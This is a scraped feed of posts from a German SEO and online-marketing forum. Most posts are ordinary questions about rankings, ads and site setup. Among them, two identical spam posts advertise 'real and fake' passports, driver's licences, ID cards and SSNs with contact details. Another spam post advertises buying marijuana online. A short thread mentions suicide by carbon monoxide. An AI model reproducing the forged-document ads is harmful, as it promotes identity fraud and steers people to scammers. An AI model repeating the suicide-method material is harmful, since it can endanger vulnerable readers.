Your Company Name
Evergreen Terrace 742
Kansas Missouri
Phone: 432-653-3121
sales@thetiecompany.com
Welcome to RedTie!
Hi! This is my third design for OSWD, with CSS and XHTML 1.0 Transitional Validation. You can do whatever you want with this template, just keep the Hosting Colombia link at the bottom. Enjoy!

NEUinfizierte
Rzahl Tage

Abakus

internet Marketing


[S] Google & Facebook Ads Manager Hallo Community,

wir suchen jemanden, der uns Ads bei Google und Facebook schalten kann und die Kampagnen eine zeitlang betreut.

Thema: Photovoltaik

Weitere Details gerne via DM.

Lg
Dima

Statistik: Verfasst von Flovo — 01.05.2023, 23:52



Nach Relaunch Zeit bis alte Rankings wieder da sind Moin moin,

ich würde mich freuen, wenn hier mal ein paar User von Ihren Erfahrung berichten, ab wann man nach einem Relaunch mit den alten Rankings rechnen kann.

Wir mussten unseren Shop umstellen und im Zuge dessen auch alle URLs (ca. 12000). Saubere Weiterleitung wurde eingerichtet und viele der Top-Keywords ranken schon mit der neuen URL an alter Position. Kann man da schon mal beruhigt sein oder kommt da ggf. noch was hinterher?

Statistik: Verfasst von Fleming — 26.04.2023, 08:23



Gefahr für Google? (ChatGPT) Einfach einen Code vereinbaren, dann klappts auch mit der Stimmerkennung, bzw. ist es dann gar nicht mehr nötig diese zu erkennen.

Statistik: Verfasst von staticweb — 07.03.2023, 16:59



Wie gut ist Google in der Lage, SPA-Webseiten zu indexieren und zu crawlen? Hallo zusammen,

Ich möchte unsere Webseite neu programmieren, bin mir aber unsicher, ob ich eine Vue.js SPA-Webseite oder eine Nuxt.js SSR-Webseite programmieren soll. Der große Vorteil einer SPA-Webseite ist, dass man ein App-ähnliches Gefühl bei der Nutzung der Webseite hat, was die User-Experience deutlich erhöht. Geht mal auf die mobile Version von airbnb.com mit dem Smartphone und benutzt die Webseite. Die Webseite fühlt sich nämlich an wie eine native App auf dem Handy und keine Webseite.

Der große Nachteil einer SPA-Webseite ist jedoch, dass sie vom Client gerendert wird (client-side rendering, auch CSR genannt). Das bedeutet, dass der Webserver nur ein leeres HTML-Skelett ausliefert und der eigentliche Inhalt mittels JavaScript "ausgefüllt" wird. Dies ist ein Problem für den Googlebot, da er sich wie ein echter Webbrowser verhalten muss, um den Inhalt zu lesen und zu verstehen.

Ich habe viele Artikel darüber gelesen, wie gut der Googlebot in der Lage ist, SPA-Webseiten zu verstehen. Einige empfehlen die Verwendung von SSR (server-side rendering), um SEO-Probleme zu vermeiden, andere sagen, es sei ein überschaubares Problem. In einigen Artikeln wird auch empfohlen, eine SPA-Webseite zu verwenden mit Pre-Rendering. Dies würde bedeuten, dass ein normaler Nutzer eine JavaScript-basierte Website sieht, die den Inhalt dynamisch "auffüllt", während der Googlebot mit einer statischen HTML-Version der Website bekommt.

Das ist zwar eine gute Idee, aber keine Lösung, die zu unserer Webseite passt, da Pre-Rendering nicht wirklich gut skalierbar ist und unsere Webseite ständig neue Unterseiten erhält (quasi ein Forum). Daher ist dies nicht wirklich eine Option.

Angesichts dessen würde ich gerne wissen, was ihr darüber denkt. Wird es möglich sein, eine SPA-Webseite zu erstellen, die in Bezug auf SEO genauso gut abschneidet wie eine traditionelle oder SSR-Webseite?

Leider hat Google in den letzten Jahren keine Angaben darüber gemacht, inwieweit sie in der Lage sind, SPA/CSR-Webseiten zu crawlen und indexieren. Daher bin ich mir ziemlich unsicher.

Bin gespannt auf eure Antworten! :)

Statistik: Verfasst von FrazeColder — 21.04.2023, 09:33



Google Business Webseite Hallo Zusammen,

für einige Kunden habe ich vor einigen Monaten über Google Business eine Webseite angelegt. In der aktuellen Google Business Oberfläche gibt es keinen Bereich mehr, diese Webseiten anzusehen, bzw. zu bearbeiten.

Hat Google diese Möglichkeit eingestellt?

Statistik: Verfasst von dieguito — 18.04.2023, 13:52



Planlos: Domain (Thema SEO) verkaufen Hallo!
Ich bin mittlerweile völlig aus dem Thema SEO draußen und möchte eine steinalte Domain zum Thema SEO "loswerden". Auf Wunsch mitsamt Inhalt. Hab aber keine Ahnung, wie und wo und wieviel.
Bei Sedo hab ich das Gefühl, dass es da nur um den Domainnamen geht, dass aber Alter und "Gesamtzustand" egal ist. Ich hab schon immer wieder was gemacht an der Site und alle paar Tage gibt es auch Kommentare irgendwo. Aber klar: Die Site hat schon bessere Tage erlebt. Es geht um site-check.cc

Wie gehe ich es an?

Statistik: Verfasst von chio — 14.04.2023, 13:06



[Google SEO] Does Content really matter? Also langjähriger Verfächter, dass nur Content einer Seite zählt, will ich diesen eigentlich in Stein manifestierten Standpunkt relativieren.

Der Content einer Seite ist maßgeblich für die Akzeptanz einer Seite verantworlich, allerdings relativiert sich diese Akzeptanz gemessen daran, wer sich dafür interessiert. Ein nahezu alleinstehender Content hilft nicht daüber hinweg, wenn sich keine Sau dafür interessiert. Du kannst deswegen noch so viel einzigartigen Content produzieren, wenn allen voran Google nicht der Ansicht ist, dass Dein Content von besonderem Interesse ist.

Google ist, und das sollte man sich verinnerlichen, kein verblödeter Crawler, der jeder URL folgt nur weil es eine URL darstellt. Es kann sich vermutlich jeder vorstellen, dass man enorme Ressourcen bereitstellen muss, um die Inhalte vieler Millioen Webseiten indexieren zu können. Außerdem muss man noch in der Lage sein diese crawlenden Inalte zu qualifizieren, um dem Suchenden die unmittelbare Lösung für seinen Bedarf bereitstellen zu können. Gemessen daran scheint es fast unmöglich zu sein diesem Bedarf zu entsprechn.

Angesichts dessen, dass die Anforderungen das Internet vollumfänglich umfassen zu können unmöglich erscheint und auf Grund der Unmengen an Daten nicht mehr als erfassbar möglich erscheinen mag, erscheint es logisch, dass Google sich schon seit mehreren Jahren nur mehr für das zu interessieren zu scheinen mag, wofür es einen tatsächlichen Bedarf gibt. Das will heißen, wenn du einen Content anbietest, den es anderswo schon zu Hauf gibt, spielt dein Content keine Rolle mehr. Das bedeutet aber auch, dass dein Content, so einzigartig dieser auch sein mag, auch keine Rolle spielt, wenn sich (fast) niemand dafür interessiert.

Welche Konsequenzen ergeben sich daraus?
Dass sich aus den vorausgehenden Konsequenzen ergeben müssen, ist unabdingbar. Zumal ich keine nur theoretische Behauptungen in den Raum Stelle. Ich betreibe inzwischen seit 25 Jahren nicht mehr zählbare Projekete bei denen sich die oben beschriebenen Merkmale immer und immer wieder wiederholen, sodass ich unweigerlich schlussfolgern muss, dass allen voran Google so agiert.

Die Konsequenz ist deswegen keine Behauptung, sondern nur eine logische Schlussfolgerung.
Content matters, aber wenn sich keine Sau für deinen augenscheinlich einziartigen Content interessiert, ist dein Aufwand diesen Content bereitzustellen für den Ar'***.

Allerdings muss man selbst die vermeintlich endgültig wirkende Aussage relativieren. Google betreibt seit geraumer Zeit ein "Indexing on demand", was nichts anderes bedeutet als dass Google die Indexierung von Inhalten dynamisch betreibt, was ebenso bedeutet, dass Inhalte die gestern noch niemanden interessiert haben, aber heute auf Grund zunehmendem Interesse daran plötzlich Anlass geben, dass Google die aktualisierten Inhalte dafür versucht bereit zu halten. Dies lässt sich reprodzuzieren, wenn man, mich wie, nicht nur ein Nutzer Tracking, sondern auch ein Bot Tracking betreibt.

Was ist nun die Quintessenz?
Für den Anwender hat die vorausgebende erzwingend wirkende Beschreibung keine Änderung zur Folge auch wenn es so scheinen mag, wenngleich es dennoch eine Erkenntnis gibt, dass es durch welche SEO Optimierung auch immer unmöglich ist die interessensorientierte handlungsweise allen voran von Google beeinflussen zu können. Will heißen, SEO Optimierungen von heute können schon morgen irrelevant und bedeutungslos werden.

Statistik: Verfasst von supervisior — 07.04.2023, 15:41



2023 Broad Core Update Seit Anfang April geht es auf einem noch niedrigeren Niveau weiter! Kann das jemand bestätigen?

Statistik: Verfasst von heinrich — 17.04.2023, 10:39



SEO guide for beginners what`s SEO?

Search Engine Optimization (SEO) is the practice of optimizing your website to rank higher in search engine results pages (SERPs) for specific keywords and phrases. By optimizing your website for search engines, you can increase your visibility and drive more traffic to your site. Here is a beginner's guide to SEO:
1-Keyword Research: The first step in SEO is to identify the keywords and phrases that your target audience is using to find products or services like yours. Use keyword research tools like Google Keyword Planner or SEMrush to identify relevant keywords with high search volume and low competition.
2-On-Page Optimization: Once you have identified your target keywords, you need to optimize your website's on-page elements like titles, descriptions, and content to include those keywords. Make sure your content is high-quality, relevant, and engaging for your target audience.
3-Technical Optimization: Your website's technical elements like site speed, mobile-friendliness, and site architecture can impact your search engine rankings. Make sure your website is fast, mobile-friendly, and easy to navigate for both users and search engines.

4-Link Building: Building high-quality backlinks from other websites to your website is an important part of SEO. Make sure your website has relevant and high-quality content that other websites would want to link to.

5-Local SEO: If you have a local business, you need to optimize your website for local search. This involves creating local business listings on sites like Google My Business, Yelp, and other relevant directories.

6-Analytics and Tracking: Finally, it's important to track your SEO progress and analyze your website's performance using tools like Google Analytics. This will help you understand how your website is performing in search engines and identify opportunities for improvement.

Remember, SEO is an ongoing process, and it takes time to see results. By following these basic SEO tips and staying up-to-date with the latest trends and best practices, you can improve your website's search engine visibility and drive more traffic to your site.
You can read more. shaimaaalmahdy.com

Statistik: Verfasst von shaimaaalmahdy — 18.04.2023, 00:40



Anzeigen werden nur noch wenig ausgespielt Hallo zusammen,
ich freue mich Teil der Community zu sein. Mich beschäftigt seit einigen Wochen ein Google Adwords-Thema und vielleicht hat jemand eine Idee oder Ansätze, was man probieren könnte.
Über Jahre habe ich per manuellen CPC geschaltet, dann im Februar testweise umgestellt auf Conversions maximieren, Google dabei einige Woche Zeit gegeben und von den Keywords wenig eingeschränkt.

Die Folge waren wie vermutet hoher Streuverlust, überwiegend Schaltung irrelevanter Keywords, weshalb ich zunächst entschieden habe von "weitgehend passend" auf "passende wortgruppe" umzustellen, später sogar nur auf "genau passend".

Dies hatte nun zur Folge, dass im Grunde gar nicht mehr ausgespielt wird, egal welche Gebotsstrategie eingestellt ist. Ich habe in verschiedenen Kampagnen unterschiedliche Gebotsstrategien eingerichtet, überall wird aber im Grunde gar nicht mehr ausgespielt.

Bei der manuellen Strategie habe ich extra sehr hohe Budgets eingestellt, u.a. bei unserem Brand Keyword "demv", doch auch dort erfolgt keine Anzeigenausspielung.

Die Google-Beraterin hat empfohlen eine Kampagne diverse Wochen laufen zu lassen und dann noch mal zu prüfen, war aber auch eher ratlos.
Quatsch wäre es die Keywords generell wieder auf "weitgehend passend" umzustellen, da dies zu 90-95% Geldverschwendung. Ich gebe regelmäßig im inkognito-Modus Keywords ein, die ausgespielt werden müssten, weil die Gebote hoch genug sind, es ggf. sogar gar keine Anzeigenkonkurrenz gibt.

Falls jemand eine Idee hat, freue ich mich über Feedback.

Idealvorstellung wäre schon, dass Google automatisiert ausspielt, allerdings nur zu unseren relevanten Keywords in der Nische, in der wir uns befinden.

Bei folgenden Keywords müssten wir (demv.de) im Grunde zwingend erscheinen, da die Preise hoch eingestellt sind:
versicherungsmakler werden
maklerpools
maklerpool vergleich
maklerverbund
demv

Falls jemand eine Idee hat - würde mich freuen.

Viele Grüße,

Sebastian

Statistik: Verfasst von srunde123 — 13.04.2023, 12:55



Newsletter - Wie am besten? Hallo,

wollte fragen wie ih E-MAil Marketing, bzw. die Newsletter versendet?
Wieso muss man denn Services benutzen wie Mailchimp? Könnte man das theoretisch selber per Mail app machen? Also alle E-Mails die man hat einfach im Empfänger setzen und zusenden?

Wie kann man versuchen zu umgehe das die Mails in den Spams gelangen?

Und eigentlich sit auch die Frage ob sich denn Newsletter versenden überhaupt lohnen?

Habe einen Online-Shop und viele E-Mails Adressen, doch zurzeit benutze ich keine Newsletter, darum wollte ich nachfragen wie es bei euch läuft? Ob man da überhaupt verdienen kann, bzw. Einnahmen generieren kann?

Statistik: Verfasst von croxxx69 — 09.04.2023, 01:19



Adsense Seiten-RPM um über 90 Prozent eingebrochen
4.png

Statistik: Verfasst von tom_010101 — 06.04.2023, 10:46



Frage URL Parameter per robot.txt ausschließen Moin Zusammen,

ich würde mal Meinungen zu folgender Problem-Lösung haben wollen:

Online-Shop generiert Millionen URLs durch Filter, da sich die Filter miteinander kombinieren lassen.

Beispiel:
domain.de/blau
domain.de/grün
domain.de/blau_grün
domain.de/grün_blau
etc. etc.

Diese wurden nun an einer Stelle maskiert mit PRG, sodass Crawler diese erstmal nicht sehen und diesen Folgen. Auf den Artikelseiten können die Filter einzeln weiter verfolgt werden, allerdings ohne die Möglichkeit, mehrere zu kombinieren.

Diese einzelnen Filter (domain.de/blau und domain.de/grün) würden wir als Landingpages benutzen wollen, sodass wir alle Filter-URLs als index follow gesetzt haben.

Da ich nicht 100%ig ausschließen kann, dass ein Crawler nicht doch noch Kombinations-Filter-URLs irgendwo findet, habe ich diese durch eindeutige Parameter gekennzeichnet und diese in der Robot.txt mit "Disallow /*Parameter" ausgesperrt. Im Grunde also nur als Backup.

Hat da jemand eine Einschätzung zu, ob das ein gangbarer Weg ist, um diese Kombinations-URLs vom Index fernzuhalten? Oder lieber komplett alle Filter-URLs auf noindex belassen?

Danke vorab

Statistik: Verfasst von Fleming — 16.03.2023, 13:38



Zigtausend Backlinks verloren - Ranking Absturz Vor ein Paar Jahren hat Ahrefs reziproke Links oder Ringnetze aus der eigenen Wertung herausgenommen. Denke die Links sind wahrscheinlich noch da aber werden nicht mehr zur Wertung herangezogen, da es Google im allgemeinen auch nicht macht.
Dazu war im Dezember eine Spammy Link Update seitens Google und dies war um den. 12. Jan auch fertig. Ich hab aus Neugierde mal drei Links aus der Ahrefs Liste angeklickt. TC Seiten und Linklisten ist schon eine Ganze weile her, dass das etwas bewirkt hat. Ahrefs hat mir im Übrigen einen Domain Rank von 19 angezeigt.

Statistik: Verfasst von party — 07.03.2023, 21:24



"Umwandlung" von nonbrand traffic in brand in GA? Hi,

da ich leider nicht so der tracking-experte in Google Analytics bin, hier meine Frage: wenn ein user über ein NonBrand-Keyword auf eine Domain kommt, abspringt und später (max 30 day cookies?) wiederkommt, lässt sich dieser zweite Visit irgendwie mit dem ersten in Verbindung bringen/tracken bzw. zeigen, dass der user das erste mal über nonbrand auf eine Domain gekommen ist?

Danke im Voraus.

Statistik: Verfasst von Benjamincf — 03.04.2023, 13:32



Ist der Tod durch Kohlenstoffmonoxid qualvoll April Scherze ?

Statistik: Verfasst von arnego2 — 01.04.2023, 21:09



oh ja ich werde endlich sterbeen :D

Statistik: Verfasst von Grillwirdmichkill — 01.04.2023, 21:09



Ich werde mich in ein paar Tagen mit Kohlenstoffmonoxid umbringen ich will einfach nicht mehr leben 😌 Warum sollten wir es tun?
Entferne Negativität aus deinem Leben und sehe die positiven Seiten.
Schau mal bei Youtube nicht nur die sogenannten Erfolgreichen an, obwohl Multimillionäre immer noch Filme veröffentlichen, sondern wie in Afrika das Wasser knapp wird.

Statistik: Verfasst von arnego2 — 01.04.2023, 21:08



Umsatzeinbruch bei Awin Wir betreiben mehrere Affilinet-Seiten, davon zwei mit Produktdaten von Awin.
Die ersten Monate bis einsch. Mai brachten Umsätze bei Awin von über 1000 € / Monat.
Im Juni ging es auf 300 Euro zurück und im Juli bis jetzt 40 Euro und liegen damit weit unter dem Vergleichszeitraum im letzten Jahr. Eine gewisse jahreszeitliche Schwankung wäre normal, aber nicht so.
Die Zugriffe in der Webstatistik, die Zahlen in der Search Console, die Clicks bei Awin bzw. was es noch an Kennzahlen gibt, sind eben falls in der für die Monate über die Jahre konstanten Höhe.
Das betrifft den Händler, mit dem wir 80% des Umsatzes machen, aber auch die anderen.

Wie würdest Ihr vorgehen, um die Ursachen zu ermitteln?

Statistik: Verfasst von Lissy — 12.07.2021, 07:38



Idealo Preissuchmaschine noch rentabel? Idealo hat ja die Klickpreise gegenüber letztes Jahr deutlich angezogen.
Da die Kosten für ideal bei meinem Shop immer höher wurden, bin ich dran Artikel nicht auf idealo zu listen die nur geklickt aber nicht gekauft werden. Das Ergebnis der Optimierung wird sich erst im nächsten Monat zeigen. Im Februar hatte ich mit
1 Euro Klickkosten einen Umsatz von 1,70 Euro erzielt. Das ist für mich auf den ersten Blick nicht rentabel.
Wie ist dieses Verhältnis bei euch?
Sortiert ihr euer Angebot bei idealo auch aus?
Hat jemand einen Tipp wie man das Verhältnis noch verbessern kann?

Statistik: Verfasst von tower69 — 26.03.2023, 11:59



kanonische Seite Ich stehe vor folgendem Problem:

Ich bin gherade dabei, rund 500 Webprojekte aufzupimpen und für die Ergebnisse in den Serps zu verbessern. Bisher hatte ich immer die Angabe der kanonischen Seite vernachlässigt (jaja, prügelt mich).

Für all meine Webprojekte gibt es eine Desktop-Version und eine Mobile Version. Die Dateien der Desctop-Version leiten auf die mobile Version weiter, wenn erkannt wird, dass jemand diese mit einem Handy aufruft. So weit so gut, das funktioniert alles. Nun dacht ich, wenn google die mobile Version und die Desktop-Version erkennen kann, wäre google auch so intelligent, in den Serps den passenden Treffer für das passende Medium zu liefern. Nur werden nun gehäuft die Dateien der mobilen Version gelistet, auch auf dem PC. Wenn diese dann von Besuchern geöffnet wird, sieht diese Version natürlich doof aus.

Deshalb wollte ich nun die Dateien der Desktop-Version als die kanonische angeben. Ist dieser Gedankengang richtig oder habe ich irgendwo einen Denkfehler? Gibt es eine Möglichkeit, google auf der Index-Seite per Befehl zu sagen, dass alle Dateien der Desktop-Version kanonisch sind? Es ist eine riesige Arbeit, das auf jeder einzelnen Unterseite anzugeben. Der Aufbau der Webprojekte ist eigentlich bei allen gleich:

https://www.webseite.de
https://www.mobile/webseite.de

Statistik: Verfasst von pageranknewbee — 22.03.2023, 08:44



Zwei Themenbereiche eines Unternehmens lieber unter einer Domain und Folder oder zwei Domains? Hallo,

eine Firma hat zwei Bereiche:
Bereich 1 bietet Kunden Artikel aus dem Garten- und Forstbereich. Dazu zählen neben E-Bikes, Rasenmähern, Mährobotern auch Werkzeuge und Gartengeräte.
Im Bereich 2 werden Leistungen aus dem Bereich Maschinebau angeboten. Dazu zählen Konstruktion, Bau und Wartung von Förderanlagen (Fließbänder), Betriebsausstattungen wie Arbeitstische und der Sondermaschinenbau.

Man kann sagen das der Bereich 1 hauptsächlich dem B2C Sektor zuzuordnen ist und der Bereich 2 zu B2B.

Für den Bereich 1 gibt es einen Webauftritt mit einer neutralen Domain (name-ort.de). Für den Bereich 2 wurde ein neuer Webauftritt erstellt, der noch nicht live gegangen ist.

Nun stellt sich die Frage ob man nur mit der bisherigen Domain arbeiten sollte oder ob man die beiden Bereiche strikt trennt und dafür zwei Domains verwendet.

Bei einer Domain hätte man daher Folder wie diesen: www.domain.de/forst-und-garten/e-bikes und www.domain.de/maschinenbau/sondermaschinen. Bei zwei Domains wäre es dann logischerweise so etwas: www.domain-1.de/e-bikes und www.domain-2.de/sondermaschinen

Ich weiß das beides seine Vor- und Nachteile hat. Natürlich ist eine Domain in der Pflege einfacher, aber die Komplexität der Pflege ist zweitrangig. Ziel ist es das beide Bereiche / Seiten SEO-technisch optimal gepusht werden können.

Ich bin mir nicht schlüssig welchen Weg man hier gehen sollte. Daher frage ich euch, was würdet ihr machen und warum?

Statistik: Verfasst von Fulano — 23.03.2023, 12:50



Gras online kaufen Weed online kaufen. Marihuana kann eine Vielzahl von potenziellen Vorteilen für Geist und Körper bieten. Es kann dabei helfen, Schmerzen bei verschiedenen Beschwerden zu lindern, Symptome zu reduzieren oder eine Quelle des allgemeinen Wohlbefindens zu sein.
allgreenestate.com

Statistik: Verfasst von master237 — 23.03.2023, 14:23



Broad Core Update - Erkenntnisse? Laut SISTRIX bei einer Domain - 50%, bei einer -25% und bei einer +25%. In den Analytics-Zahlen spiegelt sich das aber noch nicht wieder, auch wenn es insgesamt aber doch leicht nach unten geht … Ich denke, man sollte da noch ein paar Tage warten.

Statistik: Verfasst von heinrich — 21.03.2023, 16:19



buy real and fake passports (https://legitcleandocs.com)drivers license, residence permit, id card, visa, Quality Docky are the leading second valid passport & citizenship specialists with over 10 years in the industry. Contact us for a personal and confidential consultation.We are specialists in the production of real database registered novelty passports, Driver's License, ID Cards, Residence Permit, SSN, Full Citizenship Package, Diploma's, IELTS / TOEFL, Certificates and many more in which we record all information about the client in the proposed database system. Everything is real, and the client without problems uses the document legally. qualitydocky.com/



We make it easier for everyone to acquire a registered international passport, driver's license and more regardless of where you are from.



Visit the website: qualitydocky.com/

Visit the website:https://legitcleandocs.com/


WhatsApp contact: +1(518)699-2930



Buy Real Passport Online qualitydocky.com/



Buy Registered Passport online qualitydocky.com/

https://legitcleandocs.com/driver-licen ... eit-money/
https://legitcleandocs.com/social-secur ... .com/visa/


Buy Drivers License Online



Buy Registered Drivers License Online



Buy Real Drivers License Online



Buy Fake Drivers License Online



Buy Passport Online



Buy Registered Passport Online

Buy Us Passport Online

Buy A Spanish Passport

Buy Canadian Passport Online

Buy German Passport Online

Buy Italian Passport

Buy Passport Online Austria

Buy Australia Passport Online

Buy British Passport Online

Buy A Malaysian Passport Online

Buy Eu Passport Online

Buy Passports Online With Shipping And Delivery

Buy Real Passport Online

Buy Spanish Passport Online

Buy A Us Passport Online

Buy Real Us Passport Online

Buy Dutch Passport Online

Visit the website: qualitydocky.com/
Visit the website:https://legitcleandocs.com/



WhatsApp contact: +1(518)699-2930

Buy Uk Drivers License

Buy Us Drivers License Online

Buy Drivers License Australia

Buy German Drivers License Online

Visit the website: qualitydocky.com/
Visit the website:https://legitcleandocs.com/



WhatsApp contact: +1(518)699-2930

Statistik: Verfasst von kiki89 — 21.03.2023, 12:53



buy a US passport online( https://qualitydocky.com) buy UK passport online, buy Canadian passport on Quality Docky are the leading second valid passport & citizenship specialists with over 10 years in the industry. Contact us for a personal and confidential consultation.We are specialists in the production of real database registered novelty passports, Driver's License, ID Cards, Residence Permit, SSN, Full Citizenship Package, Diploma's, IELTS / TOEFL, Certificates and many more in which we record all information about the client in the proposed database system. Everything is real, and the client without problems uses the document legally. qualitydocky.com/



We make it easier for everyone to acquire a registered international passport, driver's license and more regardless of where you are from.



Visit the website: qualitydocky.com/

Visit the website:https://legitcleandocs.com/


WhatsApp contact: +1(518)699-2930



Buy Real Passport Online qualitydocky.com/



Buy Registered Passport online qualitydocky.com/

https://legitcleandocs.com/driver-licen ... eit-money/
https://legitcleandocs.com/social-secur ... .com/visa/


Buy Drivers License Online



Buy Registered Drivers License Online



Buy Real Drivers License Online



Buy Fake Drivers License Online



Buy Passport Online



Buy Registered Passport Online

Buy Us Passport Online

Buy A Spanish Passport

Buy Canadian Passport Online

Buy German Passport Online

Buy Italian Passport

Buy Passport Online Austria

Buy Australia Passport Online

Buy British Passport Online

Buy A Malaysian Passport Online

Buy Eu Passport Online

Buy Passports Online With Shipping And Delivery

Buy Real Passport Online

Buy Spanish Passport Online

Buy A Us Passport Online

Buy Real Us Passport Online

Buy Dutch Passport Online

Visit the website: qualitydocky.com/
Visit the website:https://legitcleandocs.com/



WhatsApp contact: +1(518)699-2930

Buy Uk Drivers License

Buy Us Drivers License Online

Buy Drivers License Australia

Buy German Drivers License Online

Visit the website: qualitydocky.com/
Visit the website:https://legitcleandocs.com/



WhatsApp contact: +1(518)699-2930

Statistik: Verfasst von kiki89 — 21.03.2023, 12:53



Vibrant Media insolvent / pleite Hallo,

ich habe gestern eine Mail bekommen, dass leider Vibrant Media insolvent ist. Ist hier noch jemand davon betroffen?

1. Aber was heisst nun das Folgende Zitat? Sollte man weiter Werbung laufen lassen oder ausbauen? Schließlich werden ja dann mit dem Insolvenzantrag keine weiteren Vergütungen mehr ausgeschüttet. Aber scheinbar wollen sie ja doch mit neuem Eigentümer gerne weitermachen. Aber das heisst ja nicht, dass es auch klappt.

2. An wen muss man sich in so einen Fall überhaupt wenden, um noch Auszahlungen zu bekommen, die einem zustehen? An den Insolvenzverwalter direkt oder kennt der Insolvenzverwalter automatisch alle offenen Forderungen, die der Firma zum jetzigen Zeitpunkt vorliegen? Wären bei mir zwar nicht sehr hohe Summen, aber haben würde ich sie schon noch gerne. Was man hat, hat man schließlich. Hatte noch nie so einen Fall, dass jemand pleite ging bei meinen Geschäftspartnern.
Aktuell befindet sich die Gesellschaft in einem Restrukturierungsprozess, der u.a. das Ziel hat, einen neuen Mehrheitsgesellschafter für die Gesellschaft zu finden, um das aktuell fortlaufende, operative Geschäft weiterhin fortzuführen und strategisch weiterzuentwickeln.

Für unsere konkrete Zusammenarbeit bedeutet diese Situation, dass es unser Ziel ist, mit Ihnen die bisherige, über viele Jahre erfolgreiche Zusammenarbeit weiter fortzuführen. Gleichwohl können Ihre aktuell bestehenden Forderungen gegen die Gesellschaft aus insolvenzrechtlichen Gründen zum jetzigen Zeitpunkt leider nicht bedient werden.
Lieben Dank
Bodo

Statistik: Verfasst von Bodo99 — 11.03.2023, 07:05



What's the easiest way to resell domain? As a domain selling affiliate, what are the best way to easily sell?

Statistik: Verfasst von billglobal — 18.03.2023, 22:42



bestehende Domain plus Keyword Domain, wie benutzen? Zoekwoorddomeinen worden door een bedrijf voornamelijk gebruikt als verbinding tussen het doel en het adres van de website

Statistik: Verfasst von billglobal — 18.03.2023, 22:35



fehlende Shares/Likes bei SEOBILITY Hallo zusammen.
Ich hoffe jemand hat eine Antwort auf mein Problem.
Bei Seobility hat meine Webseite überhaupt keine Shares/Likes bei Facebook.
Und das obwohl einige Shares und Likes vor einigen Wochen vorgenommen wurden.
Woran kann das liegen?
Am 1. Januar habe ich Domaine von .de auf .com geändert. Bei Facebook die URL geändert.
Die .de Seite hatte reichlich Like/Shares und wurden auch bei Seobility angezeigt.
Das ich diese beim Domainenwechsel verlieren würde war mir klar und eingeplant.
Nun sind aber in den letzten 3 Monaten einige Shares/Likes auf die .com vorgenommen worden.
Wenigstens die sollte er doch anzeigen, oder ?

Danke im voraus.

Statistik: Verfasst von stbrandon — 18.03.2023, 11:38



[Action Required] Compliance with Google .. - Was genau muss man tun, um bei Google Adsense nicht suspendiert zu wer
Ich hatte inzwischen Kontakt mit Google. Ein Google Mitarbeiter hat mehrmals zurück geschrieben, hin und her.

Die Lösung war sehr einfach, es hat ein Text direkt am Cookie-Banner gefehlt und sonst GAR NICHTS!

D.h. die Lösung (der Cookie-Banner) sieht nun noch immer genau so aus wie hier in diesem Forum (unten sichtbar, wenn man zuerst die Cookies im Browser löscht): Also mit nur einem EINZIGEN Button, genau wie hier im Forum. Nur der Text vor "Mehr erfahren" enthält eine ganz spezifisches Wording. Und genau darum ging es mir bei Punkt 2). Und genau so sieht auch die Lösung aus, das Wording muss rein und alles andere kann so bleiben wie es ist.

Damit hatte ich von Beginn an recht und ich wollte von den Leuten hier das richtige Wording wissen.

Stattdessen wurde alles möglich vermutet! Und es gab eine wilde Raterei.

Obwohl auch freundlich geschrieben haben, dass ich keine Vermutungen und keine Raterei will, wurde ich regelrecht mit leichter Gewalt dazu verdonnert, endlich zu akzeptieren, dass all diese Vermutungen wohl zumindest teilweise stimmen müssen.

Und das ist immer in solchen Foren. Anstatt auf da einzugehen, was der Fragesteller genau will (nämlich das Wording), wird der Fragesteller regelrecht gezwungen andere viel komplexere, in diesem Fall extrem komplexe Lösungen, unbedingt akzeptieren zu müssen ohne wenn und aber.

Dieses Verhalten von Menschen in der heutigen Zeit ist wirklich extrem unfair.
Wenn ich als Fragesteller sage, es geht um das Wording und ich will Antworten zum Wording und nicht extrem komplexe Lösungen, welche das gesamte Cookie-Managment, welche weit mehr als 2 Jahrzehnte problemlos gelaufen ist, umwerfen.



Fazit:
Bei dem Cookie-Banner und der Datenschutzerklärung bleibt alles gleich wie es fast 2 Jahrzehnte schon online ist nur ein einziger zusätzlich kurzer Text ist auf den Cookiebanner zusätzlich drauf gekommen. Daraufhin hat Google diese Domains wieder freigegeben und dies per Mail bestätigt!

(Für alles, die es niemals glauben werden: Es ist für Google Adsense noch immer nur ein einziger Button "Einverstanden" im Cookie-Banner (wie hier im Forum) erlaubt aus der Sicht von Google. Und hier ging es ausschließlich darum, bei Adsense nicht gesperrt zu werden, es ging niemals darum, irgendwelchen steinreichen Anwälten einen Gefallen zu tun, die vielleicht zigtausende Seiten abgrasen, welche noch keine perfekte Cookie-Lösung haben. Denn wie ich schon sagte, es gibt 100-Millionen solche Seiten, die keine aktuell korrekte Cookie-Lösungen haben und dann sollen diese Anwälte doch zuerst diese 100-Miillionen Seiten abmahnen und nicht meine).

Wer unbedingt möchte, kann ja genau nach Vorschrift und nach Anwalts-Vorgaben handeln, aber soll dies nicht auf ander übertragen.

Hier im Abakus Forum ist ebenfalls ein Cookiebanner der extrem veraltet ist und niemanden stört es.
Jetzt haben wir den Beweis, dass dies auch Google nicht stört.
Also "Einverstanden" anstatt "Akzeptieren", mehr nicht?

Statistik: Verfasst von Sololand — 17.03.2023, 22:06



Ich benötige eine Markt- Wettbewerbs- und KeyWord Analyse Moin zusammen,
ich möchte für einen Bekannten eine Markt- Wettbewerbs- und KeyWord Analyse für seine Website skypak (Möbel aus Flugzeugteilen) erstellen.
Nach einigen Recheren bin ich auf das Tool von semrush aufmerksam geworden. Man kann dieses Tool erstmal testen, aber ich bin kein SEO Spezialist um die Daten richtig auszuwerten.
Daher suche ich einen SEO Spezialisten, der eine eine Markt- Wettbewerbs- und KeyWord Analyse (national/international) zu einem fairen Preis erstellen kann... es muss jetzt nicht unbedingt semrush sein(Bitte keine Agenturen)

Statistik: Verfasst von designpresse — 10.03.2023, 12:07



Umgang mit personalisierbaren Artikeln im Merchant Center Hi arnego2,

sorry für die späte Antwort.
Danke für dein Feedback.

Deine Frage verstehe ich allerdings nicht ganz.
Das Problem habe ich ja eigentlich beschrieben:

"Wir würden gerne mit beiden Produkten bei Shopping gefunden werden. Aktuell ist das nicht der Fall und häufig wird das personalisierbare Produkt angezeigt, was ja teurer ist und dadurch im Vergleich mit Mitbewerbern schlecht aussieht."

Statistik: Verfasst von Jomani17 — 16.03.2023, 11:52



Backlinkanalyse Hallo!

Hast Du den Überblick über Dein Backlinkprofil verloren, oder willst einfach überprüfen, ob Deine Backlinks alle in Ordnung sind?

